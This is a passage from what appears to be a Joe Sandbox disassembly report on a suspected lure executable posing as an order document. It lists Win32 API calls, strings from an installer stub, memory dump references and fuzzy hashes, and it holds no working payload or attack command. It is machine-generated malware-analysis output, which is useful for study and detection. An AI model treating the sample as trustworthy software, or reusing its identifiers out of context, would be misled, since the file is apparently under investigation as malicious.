                                                  • SendMessageW.USER32(00000000), ref: 00404963
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                  • SetCursor.USER32(00000000), ref: 004049E2
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                  • SetCursor.USER32(00000000), ref: 004049FE
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N$WG@$]X
                                                  • API String ID: 3103080414-1593694079
                                                  • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                  • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                  • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,Caecias Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Caecias Setup$F
                                                  • API String ID: 941294808-1415767949
                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                    • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                  • wsprintfA.USER32 ref: 00406367
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                  • API String ID: 2171350718-2529913679
                                                  • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                  • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                  • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                  • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  Strings
                                                  • "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe", xrefs: 00406994
                                                  • *?|<>/":, xrefs: 004069A2
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406951
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 589700163-2423549084
                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                  • GetSysColor.USER32(00000000), ref: 004046E3
                                                  • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                  • SetBkMode.GDI32(?,?), ref: 004046FB
                                                  • GetSysColor.USER32(?), ref: 0040470E
                                                  • SetBkColor.GDI32(?,?), ref: 0040471E
                                                  • DeleteObject.GDI32(?), ref: 00404738
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 743325C2
                                                    • Part of subcall function 743312CC: lstrcpynW.KERNEL32(00000000,?,7433137F,00000019,743311CA,-000000A0), ref: 743312DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 74332548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 74332563
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @H3w
                                                  • API String ID: 4216380887-4275297014
                                                  • Opcode ID: 25df1e3754a49a79fd7f1416e4fc83d4288b4c564783d103b27218f7ae5d0a86
                                                  • Instruction ID: 4ee10198dd2f2826b93d2214066ea08ee520c1034384055a6afcea2ed5312e10
                                                  • Opcode Fuzzy Hash: 25df1e3754a49a79fd7f1416e4fc83d4288b4c564783d103b27218f7ae5d0a86
                                                  • Instruction Fuzzy Hash: 2041BDB1208705EFE715DF26E840E6AB7BCFB98310FA4891EE44E86181E735A745CB61
                                                  APIs
                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                  • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                  • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                  • GetTickCount.KERNEL32 ref: 0040308C
                                                  • wsprintfW.USER32 ref: 004030BA
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                    • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,00073A33), ref: 0040304C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                  • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                  • GetMessagePos.USER32 ref: 00404FFF
                                                  • ScreenToClient.USER32(?,?), ref: 00405019
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                  • wsprintfW.USER32 ref: 0040300A
                                                  • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                  APIs
                                                    • Part of subcall function 743312BB: GlobalAlloc.KERNEL32(00000040,?,743312DB,?,7433137F,00000019,743311CA,-000000A0), ref: 743312C5
                                                  • GlobalFree.KERNEL32(?), ref: 74332743
                                                  • GlobalFree.KERNEL32(00000000), ref: 74332778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 7a5dbfa309236957c672f66a5a415baedca4319106a68dd64df2c6d1e494d0bc
                                                  • Instruction ID: 400f06d623959bd1cf5a8bf911abdf5410c758a53a68cc84e5c4801e949aebab
                                                  • Opcode Fuzzy Hash: 7a5dbfa309236957c672f66a5a415baedca4319106a68dd64df2c6d1e494d0bc
                                                  • Instruction Fuzzy Hash: 0331E232314501EFEB168F56DD84D7ABBBEFF89300BA4452DF14D83221C7316A458B61
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
